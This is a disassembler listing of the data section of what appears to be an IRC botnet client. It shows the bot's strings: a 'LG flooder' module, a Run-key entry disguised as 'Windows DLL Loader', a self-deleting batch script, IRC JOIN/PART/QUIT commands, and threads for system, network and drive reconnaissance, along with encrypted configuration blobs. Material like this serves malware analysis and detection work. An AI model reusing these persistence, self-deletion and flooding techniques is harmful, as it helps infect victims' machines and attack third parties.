a172_ db '172.',0 ; DATA XREF: sub_4041B7+20�o
align 4
a127_ db '127.',0 ; DATA XREF: sub_4041B7+5�o
align 10h
aU_U_U_U db '%u.%u.%u.%u',0 ; DATA XREF: sub_40D871+1CC�o
; .text:00411595�o
a1 db '::1',0 ; DATA XREF: sub_40435B+42�o
aU_0 db '%u',0 ; DATA XREF: .text:00405A3D�o
; .text:00405C83�o ...
align 4
aU_U_U_UU_0 db '%u.%u.%u.%u:%u',0 ; DATA XREF: .text:00405903�o
; .text:004059F0�o ...
align 4
aU_U_U_UU db '%u.%u.%u.%u:%u',0Dh,0Ah,0 ; DATA XREF: .text:00405888�o
; .text:00405994�o ...
align 4
aU db '%u',0Dh,0Ah,0 ; DATA XREF: .text:0040580E�o
; .text:00405936�o ...
align 10h
aLgFlooder db 'LG flooder',0 ; DATA XREF: sub_405E45+109�o
align 4
aGetmoduleinfor db 'GetModuleInformation',0 ; DATA XREF: sub_405FA3+5E�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_405FA3+4B�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_405FA3+38�o
align 10h
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_405FA3:loc_405FC8�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_405FA3+F�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_406041+136�o
; .data:0041BBD0�o ...
align 4
dword_418B04 dd 2343003h, 3693425h, 25202E02h, 20583830h, 58383025h
; DATA XREF: .text:0040647A�o
dd 732520h
dword_418B1C dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 320676Eh
; DATA XREF: .text:004063CD�o
dd 25023430h, 2032569h, 6F727020h, 73736563h, 3A7365h
aListProcesses db 'List processes',0 ; DATA XREF: sub_4064BF+31�o
align 4
a02x db '%02X',0 ; DATA XREF: sub_406722+266�o
; sub_4147E5+11�o ...
align 4
a08x db '%08X',0 ; DATA XREF: sub_406722+201�o
; sub_40A9CF+1C12�o
align 4
aS db '%s',0 ; DATA XREF: sub_406722+1E3�o
; sub_406722+296�o ...
align 4
aHkus db 'HKUS',0 ; DATA XREF: sub_406722+8D�o
align 10h
aHklm db 'HKLM',0 ; DATA XREF: sub_406722+6B�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_406722+49�o
align 10h
aHkcr db 'HKCR',0 ; DATA XREF: sub_406722+27�o
align 4
off_418B88 dd offset aOxULN ; DATA XREF: sub_406E8E+4B�r
; sub_406E8E+8D�r ...
; "Ž•ÄÑîÔ«Æ"
off_418B8C dd offset dword_418DA8 ; DATA XREF: sub_406E8E+106�r
; sub_406E8E+12A�r ...
dd offset aLxULN ; "«•ÖÃîÔ«Æ"
dd offset dword_418DA8
dd offset aBxQ ; "•ÅóŸ¶Û"
dd offset dword_418D64
dd offset dword_418D54
dd offset dword_418D34
dd offset dword_418D20
dd offset dword_418D34
dd offset dword_418D0C
dd offset dword_418CF4
dd offset dword_418CE4
dd offset dword_418CD0
dd offset dword_418CBC
dd offset dword_418C9C
dd offset dword_418C88
dd offset dword_418C6C
dd offset aScIRns ; "‘–ØßÔ‰¸è»"
dd offset dword_418C6C
dd offset aGkQ ; "ƒŠÐóŸ¶Û"
dd offset dword_418C24
dd offset dword_418C10
dd offset dword_418BF0
align 10h
dword_418BF0 dd 0C2D48FAFh, 0D8A189F2h, 0BD97B0BCh, 0DF85B08Fh, 0F5979287h
; DATA XREF: .data:00418BE4�o
dd 0D1A28AE5h, 0ACF5BAh, 0
dword_418C10 dd 0C0CF838Bh, 0DBBC95F1h, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BE0�o
dword_418C24 dd 0DCC796A3h, 0CAAF99F4h, 0F3B0FFA1h, 0D48EB4B7h, 0D1F0C690h
; DATA XREF: .data:00418BDC�o
dd 0DFB99FE9h, 0B68DB0B1h, 0D29EA389h, 87h, 0
aGkQ db 'ƒŠÐóŸ¶Û',0 ; DATA XREF: .data:00418BD8�o
align 4
dd 0
aScIRns db '‘–ØßÔ‰¸è»',0 ; DATA XREF: .data:00418BD0�o
dd 0
dword_418C6C dd 0DFD896B1h, 9EBC9FF1h, 80BCE59Bh, 0D483A682h, 0C0F6C68Fh
; DATA XREF: .data:00418BCC�o
; .data:00418BD4�o
dd 0EDh, 0
dword_418C88 dd 0DFD89691h, 0DDB889F1h, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BC8�o
dword_418C9C dd 0D4D98FB5h, 9EBD8DF2h, 0A4AAF586h, 919CA794h, 0D5C58FA4h
; DATA XREF: .data:00418BC4�o
dd 0D2A29BEAh, 2 dup(0)
dword_418CBC dd 0D5C58F84h, 0D2A29BEAh, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BC0�o
dword_418CD0 dd 0D1D98FB5h, 0FFEE8AF0h, 0A7B0F5AFh, 2 dup(0) ; DATA XREF: .data:00418BBC�o
dword_418CE4 dd 0D1D98F95h, 0DBE08AF0h, 0F5B0h, 0 ; DATA XREF: .data:00418BB8�o
dword_418CF4 dd 0D4D98FB5h, 9EBD8DF2h, 0BFAEE88Dh, 0C392A794h, 2 dup(0)
; DATA XREF: .data:00418BB4�o
dword_418D0C dd 0DCC79E87h, 0CCAB88F2h, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BB0�o
dword_418D20 dd 0F9D98F95h, 0D0A19DF2h, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BA8�o
dword_418D34 dd 0D4D98FB5h, 9EBD8DF2h, 0BCB9FF84h, 0C1B6F595h, 0D3DE8A92h
; DATA XREF: .data:00418BA4�o
; .data:00418BAC�o
dd 0D1A78EFCh, 0A6h, 0
dword_418D54 dd 0DFD0898Eh, 0C6ABD4F3h, 0ADh, 0 ; DATA XREF: .data:00418BA0�o
dword_418D64 dd 0D5DE8AA1h, 0EDEE8EF3h, 0B6A8E2ADh, 0C4A5F589h, 0DDDE928Ch
; DATA XREF: .data:00418B9C�o
dd 0CC9EDAF8h, 0A0BBF3A7h, 88h, 0
aBxQ db '•ÅóŸ¶Û',0 ; DATA XREF: .data:00418B98�o
align 8
aLxULN db '«•ÖÃîÔ«Æ',0 ; DATA XREF: .data:00418B90�o
align 8
dword_418DA8 dd 0D1D489AEh, 0DB9DDAF1h, 0BAACE5ABh, 0F0D7AC8Fh, 0DFDF9297h
; DATA XREF: .data:off_418B8C�o
; .data:00418B94�o
dd 0C7BA93EFh, 0A1BBC3E8h, 0D494BC8Dh, 2 dup(0)
aOxULN db 'Ž•ÄÑîÔ«Æ',0 ; DATA XREF: .data:off_418B88�o
align 10h
asc_418DE0 db ':)',0 ; DATA XREF: sub_406A23+9C�o
align 4
asc_418DE4: ; DATA XREF: sub_406A23+1B�o
; sub_406AE7+1B�o ...
unicode 0, <\>,0
aExplorer_exe db '\explorer.exe',0 ; DATA XREF: sub_406B81+1B�o
align 4
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_406C51+1C�o
align 4
a@echoOffDelete db '@echo off',0Dh,0Ah ; DATA XREF: sub_406D90+A8�o
db ':deleteagain',0Dh,0Ah
db 'del /A:H /F %s',0Dh,0Ah
db 'del /F %s',0Dh,0Ah
db 'if exist %s goto deleteagain',0Dh,0Ah
db 'del %s',0Dh,0Ah,0
align 4
a_bat db '.bat',0 ; DATA XREF: sub_406D90+39�o
align 4
aWindowsDllLoad db 'Windows DLL Loader',0 ; DATA XREF: sub_406E8E+20D�o
; sub_407148+19D�o
align 10h
aQuitSUninstall db 'QUIT :%s uninstalled.',0 ; DATA XREF: sub_407148+177�o
; sub_407148+1C9�o
align 4
dword_418EB8 dd 6E6E6F43h, 69746365h, 66206E6Fh, 206D6F72h, 2343003h
; DATA XREF: .text:00407442�o
dd 2037325h, 206F7420h, 6B636F73h, 34300373h, 3752502h
dd 65732002h, 72657672h, 7325h
aRejected db ' rejected',0 ; DATA XREF: .text:loc_407423�o
align 4
dword_418EF8 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: .text:004076B7�o
dd 736B636Fh, 72657320h, 20726576h, 70206E6Fh, 2074726Fh
dd 2343003h, 2037325h, 0
dword_418F2C dd 6B636F53h, 65732073h, 72657672h, 206E6F20h, 74726F70h
; DATA XREF: sub_4077DD+9C�o
dd 34300320h, 3732502h, 2
dword_418F4C dd 20h ; DATA XREF: sub_407928+4C�o
; sub_407928+96�o ...
dword_418F50 dd 30h ; DATA XREF: sub_407E0C+CB�o
; sub_40CA29+13D�o ...
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_407F3D+118�o
; sub_40806A+BD�o
dword_418F60 dd 9ED9958Fh, 0A395FEh, 0 ; DATA XREF: sub_408887+6�o
dword_418F6C dd 9EC09195h, 0CCBC9FE9h, 0BCBDBEA9h, 0C395FB96h, 2 dup(0)
; DATA XREF: sub_408887+14�o
dword_418F84 dd 9ED9958Fh, 9FF9h, 0 ; DATA XREF: sub_408887+22�o
aJzFl db '†‡Âݳ”«Ê',0 ; DATA XREF: sub_408887+30�o
align 10h
dword_418FA0 dd 0D7D88985h, 0DFE09FF1h, 0ADh, 0 ; DATA XREF: sub_408887+3E�o
dword_418FB0 dd 0D5D98F8Ch, 90A089F0h, 0FDB3FFABh, 0A09Ah, 0 ; DATA XREF: sub_408887+4C�o
off_418FC4 dd offset dword_4190E8 ; DATA XREF: sub_4088FC+19�r
; sub_4088FC+60�r
off_418FC8 dd offset dword_4190B4 ; DATA XREF: sub_4088FC+8A�r
dd offset dword_419098
dd offset dword_419054
dd offset dword_41903C
dd offset dword_418FE4
dd 2 dup(0)
dword_418FE4 dd 0DEC08986h, 0DAAF95F1h, 0BEBFF7E6h, 0C8D9A69Eh, 0DFD88E83h
; DATA XREF: .data:00418FD8�o
dd 0D3A199B3h, 0BEBFF7E7h, 0D5D8A69Eh, 0DCD9918Dh, 91AA9BF2h
dd 0BDB9F9BBh, 0C1D8B19Eh, 0D1D4968Dh, 0DFB7D5EDh, 8CB1FFA0h
dd 0D49DB099h, 0D5DB8395h, 0CA91C8F9h, 0E2F3A1A5h, 0D48FB0D5h
dd 2 dup(0)
dword_41903C dd 0D7999597h, 0CDAB97FCh, 0BAA7BEF9h, 0D2D9B296h, 8B8Dh
; DATA XREF: .data:00418FD4�o
dd 0
dword_419054 dd 0DEC08986h, 0DAAF95F1h, 0E2F1A3E7h, 82D8B3D4h, 818380D3h
; DATA XREF: .data:00418FD0�o
dd 93F9C8A9h, 0B6EAA0F0h, 0D7CFE1D6h, 0D38FCBDBh, 8BE3C2ACh
dd 0EABAA1A9h, 89C2B7C8h, 9FD2D5D7h, 0CDAF89F0h, 0FDBDFEB1h
dd 92AD9Eh, 0
dword_419098 dd 0DEC08986h, 0DAAF95F1h, 0B0B7FDE6h, 0DE84BA89h, 0D3999284h
; DATA XREF: .data:00418FCC�o
dd 97F2h, 0
dword_4190B4 dd 0D1C38786h, 91A09FB2h, 0FCB9F9AAh, 0C385A098h, 9FC38887h
; DATA XREF: .data:off_418FC8�o
dd 0D9A195DAh, 0BC8AF5A4h, 0D095B994h, 0C3D9AF90h, 0D2A29BE9h
dd 0B6F0E2ADh, 0B083h, 0
dword_4190E8 dd 0DCD88996h, 90BC9BFFh, 0B4B1FFAFh, 0D2D9B097h, 8B8Dh
; DATA XREF: .data:off_418FC4�o
dd 0
dword_419100 dd 415355h ; DATA XREF: sub_408342+2C�o
dword_419104 dd 74737953h, 69206D65h, 726F666Eh, 6974616Dh, 2D206E6Fh
; DATA XREF: .text:0040877B�o
dd 3A534F20h, 6E695720h, 73776F64h, 34300320h, 3732502h
dd 25282002h, 76202C73h, 2343003h, 252E6425h, 2C020364h
dd 30036220h, 64250234h, 2E290203h, 55504320h, 7325203Ah
dd 34300320h, 3642502h, 7A484D02h, 6152202Eh, 3203A6Dh
dd 25023430h, 4D020364h, 30032F42h, 64250234h, 424D0203h
dd 65726620h, 49202E65h, 3A367650h, 34300320h, 3732502h
dd 55202E02h, 6D697470h, 3203A65h, 25023430h, 64020364h
dd 73257961h, 34300320h, 3642502h, 756F6802h, 20732572h
dd 2343003h, 2036425h, 756E696Dh, 73256574h, 6F43202Eh
dd 7475706Dh, 616E7265h, 203A656Dh, 2343003h, 2037325h
dd 7355202Eh, 203A7265h, 2343003h, 2037325h, 0A0D2Eh
dword_4191F4 dd 73h ; DATA XREF: .text:loc_4086C8�o
; .text:loc_4086E7�o ...
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: .text:0040867F�o
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: .text:00408643�o
align 4
aNo db 'No',0 ; DATA XREF: .text:loc_4085EB�o
; .text:loc_408CB4�o ...
align 10h
aYes db 'Yes',0 ; DATA XREF: .text:004085DF�o
; .text:00408CA8�o ...
a2003 db '2003',0 ; DATA XREF: .text:004085AC�o
; .data:0041BD9C�o
align 4
aXp db 'XP',0 ; DATA XREF: .text:0040858E�o
align 10h
a2000 db '2000',0 ; DATA XREF: .text:00408570�o
; .data:0041BD90�o
align 4
aMe db 'ME',0 ; DATA XREF: .text:00408552�o
align 4
a98 db '98',0 ; DATA XREF: .text:00408534�o
align 10h
aNt db 'NT',0 ; DATA XREF: .text:00408513�o
align 4
a95 db '95',0 ; DATA XREF: .text:00408500�o
align 4
aNoSp db 'no SP',0 ; DATA XREF: .text:004084DB�o
align 10h
a?: ; DATA XREF: .text:004084D1�o
unicode 0, <?>,0
aSysinfoThread db 'Sysinfo thread',0 ; DATA XREF: sub_4087C4+2B�o
align 4
dword_419284 dd 7774654Eh, 206B726Fh, 6F666E69h, 74616D72h, 206E6F69h
; DATA XREF: .text:00408E04�o
dd 6F48202Dh, 203A7473h, 2343003h, 2037325h, 614E202Eh
dd 203A656Dh, 2343003h, 2037325h, 7954202Eh, 203A6570h
dd 2343003h, 2037325h, 5049202Eh, 203A3676h, 2343003h
dd 2037325h, 6946202Eh, 61776572h, 64656C6Ch, 3003203Ah
dd 73250234h, 202E0203h, 6574614Ch, 3A79636Eh, 34300320h
dd 3732502h, 25202C02h, 53202E75h, 64656570h, 3003203Ah
dd 30250234h, 366322Eh, 424B2B02h, 6365732Fh, 5249202Eh
dd 70552043h, 656D6974h, 3003203Ah, 64250234h, 61640203h
dd 20732579h, 2343003h, 2036425h, 72756F68h, 3207325h
dd 25023430h, 6D020364h, 74756E69h, 2E732565h, 0
aGood db 'Good',0 ; DATA XREF: .text:00408D29�o
align 4
aAvarage db 'Avarage',0 ; DATA XREF: .text:00408D13�o
aBad db 'Bad',0 ; DATA XREF: .text:00408CFD�o
aLan db 'LAN',0 ; DATA XREF: .text:loc_408C8F�o
aModem db 'Modem',0 ; DATA XREF: .text:00408C7D�o
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: .text:00408C25�o
; .text:00408C38�o
aNetinfoThread db 'Netinfo thread',0 ; DATA XREF: sub_408E4A+2B�o
align 4
dword_419398 dd 5C3A41h ; DATA XREF: sub_408E8E+6�r
; .text:00408F7C�r ...
dword_41939C dd 6F547325h, 206C6174h, 76697264h, 203A7365h, 2343003h
; DATA XREF: .text:0040919E�o
dd 2037525h, 6F54202Ch, 206C6174h, 63617073h, 3203A65h
dd 25023430h, 4D020375h, 72662042h, 2E6565h
dword_4193D4 dd 30037325h, 73250234h, 73250203h, 0 ; DATA XREF: .text:0040911B�o
dword_4193E4 dd 30037325h, 73250234h, 73250203h, 34300320h, 3752502h
; DATA XREF: .text:004090F3�o
dd 20424D02h, 65657266h, 0
dword_419404 dd 202Eh ; DATA XREF: .text:004090AA�o
; .text:00409178�o
aUnknown_0 db 'unknown',0 ; DATA XREF: .text:loc_40902D�o
; sub_4129CA+34�o
aRamdisk db 'ramdisk',0 ; DATA XREF: .text:00409024�o
aCdRom db 'cd-rom',0 ; DATA XREF: .text:00409012�o
align 10h
aRemote db 'remote',0 ; DATA XREF: .text:00409000�o
align 4
aFixed db 'fixed',0 ; DATA XREF: .text:00408FEE�o
align 10h
aRemovable db 'removable',0 ; DATA XREF: .text:00408FDC�o
align 4
aDriveInformati db 'Drive information - ',0 ; DATA XREF: .text:00408F5C�o
align 4
aDriveinfoThrea db 'Driveinfo thread',0 ; DATA XREF: sub_4091E2+2B�o
align 4
aThread db 'thread',0
align 10h
aBtg db 'btg',0
dword_419474 dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: .text:0040941D�o
aBtgTriedExecut db '- btg tried executing an unreadable address. (%08X)',0
aS_0 db '*%s*',0 ; DATA XREF: sub_4097A7+81�o
; sub_4098F3+C4�o
align 4
dword_4194BC dd 2343003h, 2036925h, 7325202Eh, 0 ; DATA XREF: .text:00409BAF�o
dword_4194CC dd 3430032Dh, 2037802h ; DATA XREF: .text:loc_409B25�o
aNoThreadsRunni db '- No threads running.',0
align 4
dword_4194EC dd 3430032Dh, 2037802h, 694C202Dh, 6E697473h, 30032067h
; DATA XREF: .text:00409B0F�o
dd 69250234h, 32F0203h, 25023430h, 20020369h, 65726874h
dd 3A736461h, 0
aCouldNotGetAVa db 'Could not get a valid ICMP handle',0Ah,0 ; DATA XREF: sub_409CB1+15�o
align 10h
dword_419540 dd 2343003h, 2036425h, 2020202Eh, 3 dup(2020202Ah), 6F727245h
; DATA XREF: .text:0040A173�o
dd 30033A72h, 64250234h, 203h
dword_419568 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: .text:0040A14F�o
dd 736D6425h, 34300320h, 2E642502h, 252E6425h, 64252E64h
dd 203h
dword_419594 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: .text:0040A0FF�o
dd 736D6425h, 34300320h, 3732502h, 25282002h, 64252E64h
dd 2E64252Eh, 296425h
aCouldNotResolv db 'Could not resolve name',0 ; DATA XREF: .text:loc_409F06�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: .text:00409E50�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: .text:00409E3A�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: .text:loc_409E24�o
align 4
aIcmp_dll db 'ICMP.DLL',0 ; DATA XREF: .text:00409E04�o
align 4
unk_419618 db 55h ; U ; DATA XREF: sub_40A1A7+C�o
db 73h, 61h, 67h
db 65h ; e
db 3Ah, 20h, 3
db 30h ; 0
db 34h, 2, 74h
db 72h ; r
db 61h, 63h, 65h
db 3
db 2, 20h, 3Ch
db 3
db 30h, 34h, 2
db 68h ; h
db 6Fh, 73h, 74h
db 3
db 2, 3Eh, 20h
aHopcountTimeou db '[<hopcount> <timeout> <pingcount>]',0
align 4
dword_41965C dd 202h ; DATA XREF: sub_40A2D2+159�o
aS_1 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40A2D2+6E�o
align 4
a43 db '43',0 ; DATA XREF: sub_40A2D2+41�o
align 4
dword_41966C dd 3430032Dh, 3752502h, 51202D02h, 79726575h, 20676E69h
; DATA XREF: sub_40A2D2+24�o
dd 2343003h, 2037325h, 726F6620h, 34300320h, 3732502h
dd 3A02h
dword_419698 dd 6F727245h, 75712072h, 69797265h, 320676Eh, 25023430h
; DATA XREF: .text:0040A4E8�o
dd 2E020373h, 0
dword_4196B4 dd 72657551h, 676E6979h, 34300320h, 3732502h, 6F662002h
; DATA XREF: sub_40A50E+97�o
dd 30032072h, 73250234h, 203h
dword_4196D4 dd 0D9D88E95h, 0CCAFD4EEh, 0BDF0FEA1h, 0A19Eh, 0
; DATA XREF: sub_40A50E:loc_40A562�o
aAbcdef db 'abcdef',0 ; DATA XREF: sub_40A8AD+1B�o
align 10h
aUsername db 'username',0 ; DATA XREF: sub_40A9CF:loc_40C8EA�o
align 4
aId db 'id',0 ; DATA XREF: sub_40A9CF+1EF2�o
align 10h
dword_419700 dd 259B8h ; DATA XREF: sub_40A9CF+1ECD�r
align 8
dword_419708 dd 69747055h, 2D20656Dh, 73795320h, 3A6D6574h, 34300320h
; DATA XREF: sub_40A9CF+1EB1�o
dd 3642502h, 79616402h, 3207325h, 25023430h, 68020364h
dd 2572756Fh, 30032073h, 64250234h, 696D0203h, 6574756Eh
dd 202E7325h, 3A435249h, 34300320h, 3642502h, 79616402h
dd 3207325h, 25023430h, 68020364h, 2572756Fh, 30032073h
dd 64250234h, 696D0203h, 6574756Eh, 7325h
dword_41977C dd 577ED30h ; DATA XREF: sub_40A9CF+1C87�r
dd 2 dup(0)
dword_419788 dd 5658h ; DATA XREF: sub_40A9CF+1C72�r
align 10h
dword_419790 dd 4827598h ; DATA XREF: sub_40A9CF+1C4B�r
dd 2 dup(0)
a9252 db '9252',0 ; DATA XREF: sub_40A9CF+1BFA�o
align 4
dword_4197A4 dd 2DEB94F9h ; DATA XREF: sub_40A9CF+1BE9�r
dd 3 dup(0)
dword_4197B4 dd 2E6BE5C8h ; DATA XREF: sub_40A9CF+1BC2�r
align 10h
dword_4197C0 dd 2E5B8h ; DATA XREF: sub_40A9CF+1BAD�r
align 8
dword_4197C8 dd 2495E5C8h ; DATA XREF: sub_40A9CF+1B86�r
dd 2 dup(0)
dword_4197D4 dd 24858h ; DATA XREF: sub_40A9CF+1B71�r
dd 0
dword_4197DC dd 21DFB0F8h ; DATA XREF: sub_40A9CF+1B36�r
dd 2 dup(0)
dword_4197E8 dd 6B6E696Ch, 30037620h, 64250234h, 32E0203h, 25023430h
; DATA XREF: sub_40A9CF+1B17�o
dd 3643330h, 20732502h, 6E69575Bh, 5D3233h
dword_41980C dd 26809888h ; DATA XREF: sub_40A9CF+1AFC�r
dd 2 dup(0)
dword_419818 dd 266E8h ; DATA XREF: sub_40A9CF+1AE7�r
align 10h
dword_419820 dd 65657053h, 3203A64h, 25023430h, 4B020375h, 65732F42h
; DATA XREF: sub_40A9CF+1AC8�o
dd 63h
dword_419838 dd 91DF38h ; DATA XREF: sub_40A9CF+19B1�r
dd 2 dup(0)
dword_419844 dd 2343003h, 2037325h ; DATA XREF: sub_40A9CF+1992�o
aHasNoIpv4End_ db ' has no ipv4 end.',0
align 10h
dword_419860 dd 20656854h, 34767069h, 646E6520h, 20666F20h, 2343003h
; DATA XREF: sub_40A9CF+1976�o
dd 2037325h, 20736920h, 2343003h, 252E6925h, 69252E69h
dd 369252Eh, 2
a2002 db '2002',0 ; DATA XREF: sub_40A9CF+1851�o
; .data:0041BD98�o
align 4
dword_419898 dd 42A40FB6h ; DATA XREF: sub_40A9CF+180B�r
dd 3 dup(0)
dword_4198A8 dd 2343003h, 2037325h, 44202D20h, 203A534Eh, 2343003h
; DATA XREF: sub_40A9CF+17C1�o
dd 2037325h, 0
dword_4198C4 dd 151858h ; DATA XREF: sub_40A9CF+1710�r
align 10h
dword_4198D0 dd 6F727245h, 65722072h, 766C6F73h, 20676E69h, 2343003h
; DATA XREF: sub_40A9CF+16F1�o
; sub_40A9CF+17EC�o
dd 2037325h, 2Eh
dword_4198EC dd 2343003h, 2037325h, 55202D20h, 6F6E6B6Eh, 74206E77h
; DATA XREF: sub_40A9CF+16AA�o
dd 20657079h, 2343003h, 2036425h, 64646120h, 73736572h
dd 3003203Ah, 73250234h, 203h
dword_419920 dd 2343003h, 2037325h, 49202D20h, 20367650h, 72646461h
; DATA XREF: sub_40A9CF+1659�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419944 dd 2343003h, 2037325h, 49202D20h, 20347650h, 72646461h
; DATA XREF: sub_40A9CF+1602�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419968 dd 3Ch ; DATA XREF: sub_40A9CF:loc_40BFBA�o
; sub_40A9CF:loc_40C011�o ...
dword_41996C dd 24858h ; DATA XREF: sub_40A9CF+1534�r
dd 0
aQuitChangingSe db 'QUIT :changing server',0 ; DATA XREF: sub_40A9CF:loc_40BED3�o
align 4
dword_41998C dd 0B7DFB102h ; DATA XREF: sub_40A9CF+14F5�r
dd 3 dup(0)
dword_41999C dd 4B836E8h ; DATA XREF: sub_40A9CF+14E0�r
dd 2 dup(0)
dword_4199A8 dd 3E08h ; DATA XREF: sub_40A9CF+14B2�r
align 10h
dword_4199B0 dd 952EF8h ; DATA XREF: sub_40A9CF+1484�r
dd 2 dup(0)
dword_4199BC dd 22F78h ; DATA XREF: sub_40A9CF+146F�r
dd 0
dword_4199C4 dd 59D83703h ; DATA XREF: sub_40A9CF+1450�r
dd 3 dup(0)
dword_4199D4 dd 72616843h, 65746361h, 6E692072h, 68202D20h, 203A7865h
; DATA XREF: sub_40A9CF+1431�o
dd 2343003h, 30257830h, 2035832h, 63656420h, 3003203Ah
dd 75250234h, 2E0203h
dword_419A04 dd 1197E8h ; DATA XREF: sub_40A9CF+1400�r
align 10h
dword_419A10 dd 2AEC3778h ; DATA XREF: sub_40A9CF+1399�r
dd 2 dup(0)
dword_419A1C dd 22DB0h ; DATA XREF: sub_40A9CF+1374�r
dd 0
dword_419A24 dd 155E78h ; DATA XREF: sub_40A9CF+135F�r
align 10h
dword_419A30 dd 135A78h ; DATA XREF: sub_40A9CF+134A�r
dd 2 dup(0)
aModeS db 'MODE %s',0 ; DATA XREF: sub_40A9CF+1333�o
dword_419A44 dd 121930h ; DATA XREF: sub_40A9CF+1310�r
align 10h
dword_419A50 dd 0D0EBFCFDh ; DATA XREF: sub_40A9CF+12E9�r
align 10h
aDebugModeIsS_ db 'Debug mode is %s.',0 ; DATA XREF: sub_40A9CF+129C�o
align 4
aOff db 'off',0 ; DATA XREF: sub_40A9CF:loc_40BC5B�o
aOn db 'on',0 ; DATA XREF: sub_40A9CF+1280�o
; sub_40A9CF:loc_40BC84�o
align 4
dword_419A7C dd 90F030h ; DATA XREF: sub_40A9CF+125F�r
dd 2 dup(0)
dword_419A88 dd 29FB0h ; DATA XREF: sub_40A9CF+122B�r
align 10h
dword_419A90 dd 58EE830h ; DATA XREF: sub_40A9CF+11E7�r
dd 2 dup(0)
dword_419A9C dd 25570h ; DATA XREF: sub_40A9CF+11A3�r
dd 0
dword_419AA4 dd 969E58h ; DATA XREF: sub_40A9CF+114C�r
align 10h
aPartS db 'PART %s',0 ; DATA XREF: sub_40A9CF+1135�o
dword_419AB8 dd 0FF778h ; DATA XREF: sub_40A9CF+1112�r
dd 2 dup(0)
dword_419AC4 dd 0FB288h ; DATA XREF: sub_40A9CF+10B0�r
align 10h
aJoinSS db 'JOIN %s %s',0 ; DATA XREF: sub_40A9CF+1098�o
; sub_40A9CF+10FA�o ...
align 4
dword_419ADC dd 12A488h ; DATA XREF: sub_40A9CF+102C�r
dd 2 dup(0)
aQuitSRemoved_ db 'QUIT :%s removed.',0 ; DATA XREF: sub_40A9CF+100A�o
align 4
dword_419AFC dd 55D1DB0h ; DATA XREF: sub_40A9CF+FF6�r
dd 2 dup(0)
dword_419B08 dd 85A058h ; DATA XREF: sub_40A9CF+FC1�r
dd 2 dup(0)
dword_419B14 dd 988A30h ; DATA XREF: sub_40A9CF+F80�r
align 10h
dword_419B20 dd 53005939h ; DATA XREF: sub_40A9CF+F52�r
align 10h
dword_419B30 dd 2AD87238h ; DATA XREF: sub_40A9CF+F24�r
dd 2 dup(0)
dword_419B3C dd 903F4F39h ; DATA XREF: sub_40A9CF+EFE�r
dd 3 dup(0)
dword_419B4C dd 3F53B78h ; DATA XREF: sub_40A9CF+ED0�r
dd 2 dup(0)
dword_419B58 dd 1054F8h ; DATA XREF: sub_40A9CF+EAA�r
dd 2 dup(0)
dword_419B64 dd 74736F48h, 72646441h, 3003203Ah, 73250234h, 203h
; DATA XREF: sub_40A9CF+E77�o
dword_419B78 dd 2AC15529h ; DATA XREF: sub_40A9CF+E5A�r
dd 3 dup(0)
dword_419B88 dd 65736162h, 64203436h, 646F6365h, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+E2F�o
dd 2037325h, 0
dword_419BA4 dd 90DB78h ; DATA XREF: sub_40A9CF+DC8�r
align 10h
aItTookMeUms_ db 'It took me %ums.',0 ; DATA XREF: sub_40A9CF+DA9�o
align 4
dword_419BC4 dd 65736162h, 65203436h, 646F636Eh, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+D20�o
dd 2037325h, 0
dword_419BE0 dd 27B78h ; DATA XREF: sub_40A9CF+CAF�r
align 8
dword_419BE8 dd 0F669DEC8h ; DATA XREF: sub_40A9CF+C68�r
dd 3 dup(0)
dword_419BF8 dd 51AF03CEh ; DATA XREF: sub_40A9CF+C05�r
dd 4 dup(0)
dword_419C0C dd 560C8BD9h ; DATA XREF: sub_40A9CF+BDE�r
dd 3 dup(0)
dword_419C1C dd 125EC8h ; DATA XREF: sub_40A9CF+B97�r
dd 2 dup(0)
dword_419C28 dd 23B2DEC8h ; DATA XREF: sub_40A9CF+B82�r
dd 2 dup(0)
dword_419C34 dd 3E3DEC8h ; DATA XREF: sub_40A9CF+B6D�r
align 10h
dword_419C40 dd 2AC19078h ; DATA XREF: sub_40A9CF+B3F�r
dd 2 dup(0)
dword_419C4C dd 203A5049h, 2343003h, 2037325h, 0 ; DATA XREF: sub_40A9CF+B20�o
dword_419C5C dd 3D18h ; DATA XREF: sub_40A9CF+B0C�r
dd 0
dword_419C64 dd 25CB99D8h ; DATA XREF: sub_40A9CF+AE5�r
align 10h
dword_419C70 dd 26F91BF8h ; DATA XREF: sub_40A9CF+AB4�r
dd 2 dup(0)
dword_419C7C dd 26F7D4F8h ; DATA XREF: sub_40A9CF+A83�r
dd 2 dup(0)
dword_419C88 dd 0BA3DCE82h ; DATA XREF: sub_40A9CF+A5D�r
dd 3 dup(0)
dword_419C98 dd 0BA3E0C3Ah ; DATA XREF: sub_40A9CF+A11�r
